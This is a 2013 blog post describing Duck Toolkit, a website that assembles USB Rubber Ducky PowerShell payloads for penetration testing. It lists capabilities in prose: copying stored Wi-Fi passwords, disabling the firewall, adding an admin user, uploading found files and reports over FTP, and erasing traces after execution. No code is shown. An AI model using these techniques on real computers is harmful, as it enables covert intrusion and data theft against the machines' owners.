Sunday, 11 August 2013

Duck Toolkit
Website: Duck Toolkit

The aim of the Duck Toolkit project was to create a website that would allow users to easily create payloads for the Hak5 USB Rubber Ducky that can be used within a penetration testing environment.
In order to achieve this goal the created product would include a website which would contain scripts for multiple operating systems that could be quickly and stealthily deployed against a target computer. The created scripts would fall under three categories; Reconnaissance, Exploitation and Reporting. Scripts from all three categories could be mixed together, allowing the user to create a payload suited for their situation. One of the most vital functions of the project however would not be the mixing of scripts but the reporting of information collected from the target computer. Reports would be generated containing information collected about the target computer based on the user’s selection and then delivered to the user via one of the Reporting methods. The information within these reports could range from installed software to network information, but is all designed to be useful in a penetration testing context.

 All created scripts were written in PowerShell and therefore will only work against target machines with PowerShell installed (Windows 7/8, Windows Server 2008). Administrative access is also required.

List of Current Scripts


Reconnaissance Scripts

  • Computer Information: Returns installed operating system, user names, system uptime, system manufacturer, hard drive size, RAM size and processor information.
  • User Information: Returns current user name, account type, users SID and if a password is required
  • Shared Drive Information: Lists all shared drives, their path and a description.
  • Installed Program List: Returns installed program names and version numbers.
  • Installed Updates: Returns a list of installed updates with Hot Fix ID, installation date and description.
  • User Document List: Returns a list of documents within the users home directory, specifically files with .doc, .docx, .pdf and .rar extensions.
  • Basic Network Information: Returns information about installed network cards, computers IP address and the computers MAC address.
  • Network Scan: Scans the network for active hosts in user specified range. A list of active hosts is returned along with possible operating system information.
  • Port Scan: Checks for open ports on the target machine against a list of pre-defined ports. Returns a list of open ports on the target computer.
  • Copy Wireless Profile: Copies the wireless profiles on the target machine, these contain the passwords for associated Wi-Fi access points and can be used to connect to the network.
  • Take Screen Captures: Takes screen captures every 60 seconds for the specified user duration.

 

Exploitation Scripts

  • Find and Upload File: Searches for a specified file on the target computer, when it is found file is uploaded via FTP. If two or more versions of the same file are found the newest version is copied.
  • Disable Firewall: Disables the firewall on the target computer.
  • Add Administrative User: Adds a user with administrative rights
  • Open Firewall Port: Opens a specified firewall port on the target computer.
  • Start Wi-Fi Access Point: Starts a Wi-Fi access point on the target computer with specified name and password.
  • Share C:\ Drive: Shares the target machines C:\ drive and all files/folders contained within it.

 

Reporting Scripts

  • Save to Target Machine: Zip archives and saves the reconnaissance report to a user specified location on the target machine.
  • Upload Report via FTP: Zip archives the reconnaissance report to a user specified FTP file hosting website.


Attack Process

  • A Notepad file with administrative rights is opened
  • Selected scripts are typed out
  • Notepad file is saved as ‘config.ps1’ in the Windows directory
  • Notepad windows is closed
  • A Command Prompt window with administrative rights is opened and PowerShell execution policy is set to unrestricted
  • PowerShell script is executed via Command Prompt
  • Command Prompt window is closed
  • After script execution ‘config.ps1’ is erased as are any other created files


Screen Shots


Script Selection

Variable Input

Language Selection

 

Script Download

Reconnaissance Report

Reconnaissance Report

Reconnaissance Report



Future Plans

  • Improve Network Scan information, with visual map of network and operating system information
  • Inclusion of Base64 Encoding tool to encode executable files under 5mb in size. The Base64 encoded string will combined with the appropriate code to enable reassembly and execution on the target machine.
  • Support more operating systems, specifically Linux Ubuntu. 
  • Optimize Current Scripts
Posted by at 1 comment:
Subscribe to: Comments (Atom)